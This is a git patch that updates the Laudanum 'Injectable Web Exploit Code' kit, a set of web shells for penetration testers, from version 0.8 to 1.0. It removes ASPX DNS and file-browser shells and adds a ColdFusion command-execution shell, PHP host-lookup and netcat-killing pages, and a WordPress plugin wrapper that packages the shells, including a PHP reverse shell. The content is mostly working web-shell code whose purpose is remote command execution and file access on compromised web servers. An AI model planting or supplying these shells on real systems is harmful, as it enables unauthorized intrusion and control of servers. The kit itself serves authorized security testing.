From 465897e5566188076d0a9d9bf98e1137c514add8 Mon Sep 17 00:00:00 2001 From: Jitendra Patro <86168235+Xhoenix@users.noreply.github.com> Date: Thu, 18 May 2023 17:39:10 +0530 Subject: [PATCH] updated to laudanum v1.0 --- Web-Shells/laudanum-0.8/aspx/dns.aspx | 144 ------- Web-Shells/laudanum-0.8/aspx/file.aspx | 154 ------- Web-Shells/laudanum-0.8/cfm/shell.cfm | 80 ---- .../{laudanum-0.8 => laudanum-1.0}/CREDITS | 10 +- Web-Shells/{laudanum-0.8 => laudanum-1.0}/GPL | 0 .../{laudanum-0.8 => laudanum-1.0}/README | 4 +- .../asp/dns.asp | 8 +- .../asp/file.asp | 8 +- .../asp/proxy.asp | 10 +- .../asp/shell.asp | 8 +- .../aspx/shell.aspx | 8 +- Web-Shells/laudanum-1.0/cfm/shell.cfm | 99 +++++ .../jsp/cmd.war | Bin .../jsp/makewar.sh | 0 .../jsp/warfiles/META-INF/MANIFEST.MF | 0 .../jsp/warfiles/WEB-INF/web.xml | 0 .../jsp/warfiles/cmd.jsp | 2 +- .../php/dns.php | 10 +- .../php/file.php | 13 +- Web-Shells/laudanum-1.0/php/host.php | 142 +++++++ Web-Shells/laudanum-1.0/php/killnc.php | 119 ++++++ .../php/php-reverse-shell.php | 0 .../php/proxy.php | 10 +- .../php/shell.php | 8 +- .../laudanum-1.0/wordpress/laudanum.php | 108 +++++ .../laudanum-1.0/wordpress/templates/dns.php | 144 +++++++ .../laudanum-1.0/wordpress/templates/file.php | 182 ++++++++ .../laudanum-1.0/wordpress/templates/host.php | 126 ++++++ .../wordpress/templates/ipcheck.php | 61 +++ .../wordpress/templates/killnc.php | 103 +++++ .../wordpress/templates/php-reverse-shell.php | 194 +++++++++ .../wordpress/templates/proxy.php | 336 +++++++++++++++ .../wordpress/templates/settings.php | 67 +++ .../wordpress/templates/shell.php | 389 ++++++++++++++++++ 34 files changed, 2119 insertions(+), 428 deletions(-) delete mode 100755 Web-Shells/laudanum-0.8/aspx/dns.aspx delete mode 100755 Web-Shells/laudanum-0.8/aspx/file.aspx delete mode 100644 Web-Shells/laudanum-0.8/cfm/shell.cfm rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/CREDITS (80%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/GPL (100%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/README (93%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/asp/dns.asp (95%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/asp/file.asp (96%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/asp/proxy.asp (97%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/asp/shell.asp (92%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/aspx/shell.aspx (95%) mode change 100755 => 100644 create mode 100644 Web-Shells/laudanum-1.0/cfm/shell.cfm rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/jsp/cmd.war (100%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/jsp/makewar.sh (100%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/jsp/warfiles/META-INF/MANIFEST.MF (100%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/jsp/warfiles/WEB-INF/web.xml (100%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/jsp/warfiles/cmd.jsp (94%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/php/dns.php (94%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/php/file.php (92%) mode change 100755 => 100644 create mode 100644 Web-Shells/laudanum-1.0/php/host.php create mode 100644 Web-Shells/laudanum-1.0/php/killnc.php rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/php/php-reverse-shell.php (100%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/php/proxy.php (97%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/php/shell.php (98%) mode change 100755 => 100644 create mode 100644 Web-Shells/laudanum-1.0/wordpress/laudanum.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/dns.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/file.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/host.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/ipcheck.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/killnc.php create mode 100755 Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/proxy.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/settings.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/shell.php diff --git a/Web-Shells/laudanum-0.8/aspx/dns.aspx b/Web-Shells/laudanum-0.8/aspx/dns.aspx deleted file mode 100755 index c9911b39..00000000 --- a/Web-Shells/laudanum-0.8/aspx/dns.aspx +++ /dev/null @@ -1,144 +0,0 @@ -<%@ Page Language="C#"%> -<%@ Import Namespace="System" %> -Laudanum - DNS - -
-QUERY:
-Type: -
-STDOUT:
-
<% = stdout.Replace("<", "<") %>
-
-
-
-STDERR:
-
<% = stderr.Replace("<", "<") %>
- - - diff --git a/Web-Shells/laudanum-0.8/aspx/file.aspx b/Web-Shells/laudanum-0.8/aspx/file.aspx deleted file mode 100755 index d0924392..00000000 --- a/Web-Shells/laudanum-0.8/aspx/file.aspx +++ /dev/null @@ -1,154 +0,0 @@ -<%@ Page Language="C#"%> -<%@ Import Namespace="System" %> -Laudanum - File - - - -<% string[] breadcrumbs = dir.Split('\\'); - string breadcrumb = ""; - foreach (string b in breadcrumbs) - { - if (b.Length > 0) - { - breadcrumb += b + "\\"; - Response.Write("" + Server.HtmlEncode(b) + ""); - Response.Write(" / "); - } - } - %> - - -<% - try - { - if (System.IO.Directory.Exists(dir)) - { - string[] folders = System.IO.Directory.GetDirectories(dir); - foreach (string folder in folders) - { - Response.Write(""); - } - } - else - { - Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir)); - Response.End(); - } - - } - catch (System.UnauthorizedAccessException ex) - { - Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir)); - Response.End(); - } - %> - -<% - System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir); - System.IO.FileInfo[] files = di.GetFiles(); - foreach (System.IO.FileInfo f in files) - { - Response.Write(""); - } - %> -
NameDateSize
" + Server.HtmlEncode(folder) + "
" + Server.HtmlEncode(f.Name) + "" + f.CreationTime.ToString() + "" + f.Length.ToString() + "
- - \ No newline at end of file diff --git a/Web-Shells/laudanum-0.8/cfm/shell.cfm b/Web-Shells/laudanum-0.8/cfm/shell.cfm deleted file mode 100644 index be0466bf..00000000 --- a/Web-Shells/laudanum-0.8/cfm/shell.cfm +++ /dev/null @@ -1,80 +0,0 @@ - - - - - - - - -Laudanum Coldfusion Shell - - - -Executable: For Windows use: cmd.exe or the full path to cmd.exe
-Arguments: For Windows use: /c command
- -Executable:
-Arguments:
- - - - - -
-
-#Replace(foo, "<", "<", "All")#
-
- -Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware. - -
-
- Copyright © 2012, Kevin Johnson and the Laudanum team.
- Written by Tim Medin.
- Get the latest version at laudanum.secureideas.net. -
- - diff --git a/Web-Shells/laudanum-0.8/CREDITS b/Web-Shells/laudanum-1.0/CREDITS similarity index 80% rename from Web-Shells/laudanum-0.8/CREDITS rename to Web-Shells/laudanum-1.0/CREDITS index 69b9a810..d6c76006 100644 --- a/Web-Shells/laudanum-0.8/CREDITS +++ b/Web-Shells/laudanum-1.0/CREDITS @@ -2,16 +2,14 @@ The Team ======================================================== - Kevin Johnson - Project Lead - -- Justin Searle - - Core Developer - Tim Medin - - Core Developer + - Project Lead -- James Jardine - - Core Developer +- Justin Searle + - Core Developer Additional Coding ======================================================== - Robin Wood +- Jason Gillam (Wordpress Plugin) \ No newline at end of file diff --git a/Web-Shells/laudanum-0.8/GPL b/Web-Shells/laudanum-1.0/GPL similarity index 100% rename from Web-Shells/laudanum-0.8/GPL rename to Web-Shells/laudanum-1.0/GPL diff --git a/Web-Shells/laudanum-0.8/README b/Web-Shells/laudanum-1.0/README similarity index 93% rename from Web-Shells/laudanum-0.8/README rename to Web-Shells/laudanum-1.0/README index 2a301ae6..0d690cc3 100644 --- a/Web-Shells/laudanum-0.8/README +++ b/Web-Shells/laudanum-1.0/README @@ -1,4 +1,4 @@ -Laudanum: Injectable Web Exploit Code v0.4 +Laudanum: Injectable Web Exploit Code v0.8 By Kevin Johnson and the Laudanum Development Team @@ -9,7 +9,7 @@ Sourceforge Site: http://sourceforge.net/projects/laudanum SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum ------------------------------------------------------------------------------- -** Copyright (C) 2012 Kevin Johnson and the Laudanum Project Team +** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team ** ** This program is free software; you can redistribute it and/or modify ** it under the terms of the GNU General Public License as published by diff --git a/Web-Shells/laudanum-0.8/asp/dns.asp b/Web-Shells/laudanum-1.0/asp/dns.asp old mode 100755 new mode 100644 similarity index 95% rename from Web-Shells/laudanum-0.8/asp/dns.asp rename to Web-Shells/laudanum-1.0/asp/dns.asp index 317c3ee1..719d1e7f --- a/Web-Shells/laudanum-0.8/asp/dns.asp +++ b/Web-Shells/laudanum-1.0/asp/dns.asp @@ -10,14 +10,14 @@ ' *** ' *** Project Leads: ' *** Kevin Johnson +' *** Tim Medin ' *** -' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** ' ******************************************************************************** ' *** ' *** This file provides access to DNS on the system. -' *** Written by Tim Medin +' *** Written by Tim Medin ' *** ' ******************************************************************************** ' *** This program is free software; you can redistribute it and/or @@ -143,7 +143,7 @@ end if %>
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/asp/file.asp b/Web-Shells/laudanum-1.0/asp/file.asp old mode 100755 new mode 100644 similarity index 96% rename from Web-Shells/laudanum-0.8/asp/file.asp rename to Web-Shells/laudanum-1.0/asp/file.asp index cc0faff8..94e2af11 --- a/Web-Shells/laudanum-0.8/asp/file.asp +++ b/Web-Shells/laudanum-1.0/asp/file.asp @@ -13,14 +13,14 @@ ' *** ' *** Project Leads: ' *** Kevin Johnson +' *** Tim Medin ' *** -' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** ' ******************************************************************************** ' *** ' *** This file provides access to the file system. -' *** Written by Tim Medin +' *** Written by Tim Medin ' *** ' ******************************************************************************** ' *** This program is free software; you can redistribute it and/or @@ -170,7 +170,7 @@ next
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/asp/proxy.asp b/Web-Shells/laudanum-1.0/asp/proxy.asp old mode 100755 new mode 100644 similarity index 97% rename from Web-Shells/laudanum-0.8/asp/proxy.asp rename to Web-Shells/laudanum-1.0/asp/proxy.asp index d5db078f..edf12799 --- a/Web-Shells/laudanum-0.8/asp/proxy.asp +++ b/Web-Shells/laudanum-1.0/asp/proxy.asp @@ -13,14 +13,14 @@ ' *** ' *** Project Leads: ' *** Kevin Johnson +' *** Tim Medin ' *** -' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** ' ******************************************************************************** ' *** ' *** This file provides access as a proxy. -' *** Written by Tim Medin +' *** Written by Tim Medin ' *** ' ******************************************************************************** ' *** This program is free software; you can redistribute it and/or @@ -74,7 +74,7 @@ function err_handler() <%=Err.Message%>
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
@@ -341,7 +341,7 @@ if len(FullUrl) = 0 then
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/asp/shell.asp b/Web-Shells/laudanum-1.0/asp/shell.asp old mode 100755 new mode 100644 similarity index 92% rename from Web-Shells/laudanum-0.8/asp/shell.asp rename to Web-Shells/laudanum-1.0/asp/shell.asp index 0cdc7c63..39af9f95 --- a/Web-Shells/laudanum-0.8/asp/shell.asp +++ b/Web-Shells/laudanum-1.0/asp/shell.asp @@ -10,14 +10,14 @@ ' *** ' *** Project Leads: ' *** Kevin Johnson +' *** Tim Medin ' *** -' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** ' ******************************************************************************** ' *** ' *** Updated and fixed by Robin Wood -' *** Updated and fixed by Tim Medin
-Copyright © 2012, Kevin Johnson and the Laudanum team.
+Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/aspx/shell.aspx b/Web-Shells/laudanum-1.0/aspx/shell.aspx old mode 100755 new mode 100644 similarity index 95% rename from Web-Shells/laudanum-0.8/aspx/shell.aspx rename to Web-Shells/laudanum-1.0/aspx/shell.aspx index cae76650..b6df6cbb --- a/Web-Shells/laudanum-0.8/aspx/shell.aspx +++ b/Web-Shells/laudanum-1.0/aspx/shell.aspx @@ -14,9 +14,9 @@ *** *** Project Leads: *** Kevin Johnson -*** Tim Medin +*** Tim Medin *** -*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** ******************************************************************************** *** @@ -120,10 +120,10 @@ STDERR:
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
- \ No newline at end of file + diff --git a/Web-Shells/laudanum-1.0/cfm/shell.cfm b/Web-Shells/laudanum-1.0/cfm/shell.cfm new file mode 100644 index 00000000..c5a02daf --- /dev/null +++ b/Web-Shells/laudanum-1.0/cfm/shell.cfm @@ -0,0 +1,99 @@ + + + + + + + + + + + + + + + + + + + + + + + Laudanum Coldfusion Shell + +
+ + Executable: For Windows use: cmd.exe or the full path to cmd.exe
+ Arguments: For Windows use: /c command
+ + Executable:
+ Arguments:
+ + + + +
+ + + + + + 
+    
+    #Replace(foo, "<", "<", "All")#
+
+ + + Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware. + +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Bug fixes by Matt Presson
+ Get the latest version at laudanum.secureideas.net. +
+ + diff --git a/Web-Shells/laudanum-0.8/jsp/cmd.war b/Web-Shells/laudanum-1.0/jsp/cmd.war similarity index 100% rename from Web-Shells/laudanum-0.8/jsp/cmd.war rename to Web-Shells/laudanum-1.0/jsp/cmd.war diff --git a/Web-Shells/laudanum-0.8/jsp/makewar.sh b/Web-Shells/laudanum-1.0/jsp/makewar.sh similarity index 100% rename from Web-Shells/laudanum-0.8/jsp/makewar.sh rename to Web-Shells/laudanum-1.0/jsp/makewar.sh diff --git a/Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF b/Web-Shells/laudanum-1.0/jsp/warfiles/META-INF/MANIFEST.MF similarity index 100% rename from Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF rename to Web-Shells/laudanum-1.0/jsp/warfiles/META-INF/MANIFEST.MF diff --git a/Web-Shells/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml b/Web-Shells/laudanum-1.0/jsp/warfiles/WEB-INF/web.xml similarity index 100% rename from Web-Shells/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml rename to Web-Shells/laudanum-1.0/jsp/warfiles/WEB-INF/web.xml diff --git a/Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp b/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp similarity index 94% rename from Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp rename to Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp index e33d3c00..fcf5308d 100644 --- a/Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp +++ b/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp @@ -34,7 +34,7 @@ disr = dis.readLine();
-Copyright © 2012, Kevin Johnson and the Laudanum team.
+Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/php/dns.php b/Web-Shells/laudanum-1.0/php/dns.php old mode 100755 new mode 100644 similarity index 94% rename from Web-Shells/laudanum-0.8/php/dns.php rename to Web-Shells/laudanum-1.0/php/dns.php index 023927ff..3b6f65b1 --- a/Web-Shells/laudanum-0.8/php/dns.php +++ b/Web-Shells/laudanum-1.0/php/dns.php @@ -10,14 +10,14 @@ *** *** Project Leads: *** Kevin Johnson +*** Tim Medin *** -*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** ******************************************************************************** *** *** This file provides access to DNS on the system. -*** Written by Tim Medin +*** Written by Tim Medin *** ******************************************************************************** *** This program is free software; you can redistribute it and/or @@ -79,7 +79,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
@@ -152,7 +152,7 @@ if ($query != '') ?>
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/php/file.php b/Web-Shells/laudanum-1.0/php/file.php old mode 100755 new mode 100644 similarity index 92% rename from Web-Shells/laudanum-0.8/php/file.php rename to Web-Shells/laudanum-1.0/php/file.php index 97bf627a..83758ae5 --- a/Web-Shells/laudanum-0.8/php/file.php +++ b/Web-Shells/laudanum-1.0/php/file.php @@ -10,14 +10,15 @@ *** *** Project Leads: *** Kevin Johnson +*** Tim Medin *** -*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** ******************************************************************************** *** *** This file allows browsing of the file system. -*** Written by Tim Medin +*** Written by Tim Medin +*** 2013-12-28 Updated by Jason Gillam - fixed parent folder *** ******************************************************************************** *** This program is free software; you can redistribute it and/or @@ -79,7 +80,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
@@ -150,7 +151,7 @@ for ($i = 0; $i < count($dirs) - 2; $i++) { echo ""; echo ""; -echo ""; +echo ""; //get listing, separate into directories and files $listingfiles = array(); @@ -187,7 +188,7 @@ else {
NameDateSize
../
../
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-1.0/php/host.php b/Web-Shells/laudanum-1.0/php/host.php new file mode 100644 index 00000000..acedb4b3 --- /dev/null +++ b/Web-Shells/laudanum-1.0/php/host.php @@ -0,0 +1,142 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides a host lookup by ip address. +*** Adapted from Laudanum dns.php by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +// ***************** Config entries below *********************** + +// IPs are enterable as individual addresses TODO: add CIDR support +$allowedIPs = array("19.168.2.16", "192.168.1.100"); + +# *********** No editable content below this line ************** + +$allowed = 0; +foreach ($allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $allowed = 1; +} + +if ($allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Hostname by IP Lookup + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$query = isset($_POST['query']) ? $_POST['query'] : ''; +$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; +?> + + + + Laudanum Host Lookup + + + + + + +

Host Lookup 0.1

+
+
+ Host Lookup: +

IP: + + +

+
+ + +"; + echo "Result = "; + print_r($result); + echo ""; +} +?> +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Web-Shells/laudanum-1.0/php/killnc.php b/Web-Shells/laudanum-1.0/php/killnc.php new file mode 100644 index 00000000..8b6b026a --- /dev/null +++ b/Web-Shells/laudanum-1.0/php/killnc.php @@ -0,0 +1,119 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file attempts to kill all netcat processes spawned by the current user. +*** This may be useful in cases where a reverse shell attempt has gone wrong. +*** +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +// ***************** Config entries below *********************** + +// IPs are enterable as individual addresses TODO: add CIDR support +$allowedIPs = array("19.168.2.16", "192.168.1.100"); + +# *********** No editable content below this line ************** + +$allowed = 0; +foreach ($allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $allowed = 1; +} + +if ($allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Hostname by IP Lookup + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + + +?> + + + + Laudanum Kill nc + + + + +

Kill nc 0.1

+ + +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Web-Shells/laudanum-0.8/php/php-reverse-shell.php b/Web-Shells/laudanum-1.0/php/php-reverse-shell.php similarity index 100% rename from Web-Shells/laudanum-0.8/php/php-reverse-shell.php rename to Web-Shells/laudanum-1.0/php/php-reverse-shell.php diff --git a/Web-Shells/laudanum-0.8/php/proxy.php b/Web-Shells/laudanum-1.0/php/proxy.php old mode 100755 new mode 100644 similarity index 97% rename from Web-Shells/laudanum-0.8/php/proxy.php rename to Web-Shells/laudanum-1.0/php/proxy.php index 1176fcde..4df6ad2a --- a/Web-Shells/laudanum-0.8/php/proxy.php +++ b/Web-Shells/laudanum-1.0/php/proxy.php @@ -11,14 +11,14 @@ ini_set('session.use_cookies', '0'); *** *** Project Leads: *** Kevin Johnson +*** Tim Medin *** -*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** ******************************************************************************** *** *** This file allows browsing of the file system. -*** Written by Tim Medin +*** Written by Tim Medin *** ******************************************************************************** *** This program is free software; you can redistribute it and/or @@ -81,7 +81,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
@@ -268,7 +268,7 @@ if ($url == "") {
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/php/shell.php b/Web-Shells/laudanum-1.0/php/shell.php old mode 100755 new mode 100644 similarity index 98% rename from Web-Shells/laudanum-0.8/php/shell.php rename to Web-Shells/laudanum-1.0/php/shell.php index a36848a0..8cf7500e --- a/Web-Shells/laudanum-0.8/php/shell.php +++ b/Web-Shells/laudanum-1.0/php/shell.php @@ -10,9 +10,9 @@ *** *** Project Leads: *** Kevin Johnson -*** Tim Medin +*** Tim Medin *** -*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** ******************************************************************************** *** @@ -87,7 +87,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
- Copyright © 2012, Kevin Johnson and the Laudanum team.
Get the latest version at laudanum.secureideas.net.
@@ -400,7 +400,7 @@ echo rtrim($padding . $_SESSION['output']);
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Updated by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-1.0/wordpress/laudanum.php b/Web-Shells/laudanum-1.0/wordpress/laudanum.php new file mode 100644 index 00000000..ecca21f3 --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/laudanum.php @@ -0,0 +1,108 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file is a Word Press plugin wrapper for Laudanum's PHP tools. As with +*** other Word Press plugins, this entire directory should be zipped up for deployment. +*** The templates/ipcheck.php file should be updated with the tester's IP address first. +*** +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + if(!class_exists("WP_Laudanum")) + { + class WP_Laudanum + { + + public function __construct() + { + add_action('admin_menu', array(&$this, 'add_menu')); + } + + public function __activate() + { + + } + + public function __deactivate() + { + + } + + public function add_menu() + { + add_options_page('Laudanum Settings', 'Laudanum', 'manage_options', 'wp_laudanum', array(&$this, 'plugin_settings_page')); + } + + public function plugin_settings_page() + { + if(!current_user_can('manage_options')) + { + wp_die(__('You do not have sufficient permissions to access this page.')); + } + + include(sprintf("%s/templates/settings.php", dirname(__FILE__))); + } + } + + register_activation_hook(__FILE__, array('WP_Laudanum', 'activate')); + register_deactivation_hook(__FILE__, array('WP_Laudanum', 'deactivate')); + + $wp_laudanum = new WP_Laudanum(); + + if(isset($wp_laudanum)) { + function plugin_settings_link($links) + { + $settings_link = 'Settings'; + array_unshift($links, $settings_link); + return $links; + } + + $plugin = plugin_basename(__FILE__); + add_filter("plugin_action_links_$plugin", 'plugin_settings_link'); + } + + } + + + + ?> \ No newline at end of file diff --git a/Web-Shells/laudanum-1.0/wordpress/templates/dns.php b/Web-Shells/laudanum-1.0/wordpress/templates/dns.php new file mode 100644 index 00000000..7107431b --- /dev/null +++ 